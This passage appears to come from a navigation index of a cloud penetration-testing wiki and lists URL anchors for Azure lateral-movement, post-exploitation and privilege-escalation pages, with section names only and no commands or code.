oacc-account","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#using-silver-tickets-with-firefox","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#on-prem---cloud-via-resource-based-constrained-delegation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#creating-kerberos-tickets-for-cloud-only-users","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.html#references","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---function-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#funciton-apps-post-exploitaiton","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysrecoveraction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#logic-apps-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsregenerateaccesskeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#use-pg_azure_storage-extension-to-access-storage-accounts","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#references","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-authorizationrules-send--recive-messages","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#references","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversconnectionpolicieswrite--microsoftsqlserversconnectionpoliciesread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverskeyswrite--microsoftsqlserverskeysread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesledgerdigestuploadsdisableaction-microsoftsqllocationsledgerdigestuploadsazureasyncoperationread-microsoftsqllocationsledgerdigestuploadsoperationresultsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasestransparentdataencryptionwrite-microsoftsqllocationstransparentdataencryptionazureasyncoperationread-microsoftsqlserversdatabasestransparentdataencryptionread","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#virtual-desktop","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#common-techniques","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-images","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-restore-points","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-disks--snapshots","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#sensitive-information-in-vm-extensions--vm-applications","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---privilege-escalation","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#hybrid-workers-group","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#custom-runtime-environments","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#compromising-state-configuration","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#az---azure-container-instances-apps--jobs-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#azure-container-instances-apps--jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aci","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aca","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappsread-microsoftappmanagedenvironmentsread-microsoftappcontainerappsrevisionsreplicas-microsoftappcontainerappsrevisionsread-microsoftappcontainerappsgetauthtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappmanagedenvironmentsread-microsoftappjobswrite-microsoftappmanagedenvironmentsjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsstartaction-microsoftappjobsread","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsrestartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread-microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbmongoclustersread--microsoftdocumentdbmongoclusterswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbmongoclustersread--microsoftdocumentdbmongoclustersfirewallruleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#roles","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#role-privileged-role-administrator","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#applications","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsmyorganizationcredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryapplicationsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#applications-privilege-escalation","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#service-principals","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalscredentialsupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalssynchronizationcredentialsmanage","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryserviceprincipalsdisable-and-enable","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#groups","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsallpropertiesupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsmembersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorygroupsdynamicmembershipruleupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#dynamic-groups-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#users","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryuserspasswordupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectoryusersbasicupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#conditional-access-policies--mfa-bypass","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#devices","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredownersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicesregisteredusersupdate","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorydevicelocalcredentialspasswordread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#bitlockerkeys","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#microsoftdirectorybitlockerkeyskeyread","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#other-interesting-permissions-todo","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#az---conditional-access-policies--mfa-bypass","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#basic-information","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#enumeration","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#conditional-acces-policies-bypasses","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.html#device-platforms---device-condition","pentesting-cloud/azure-security/az-privilege-escalati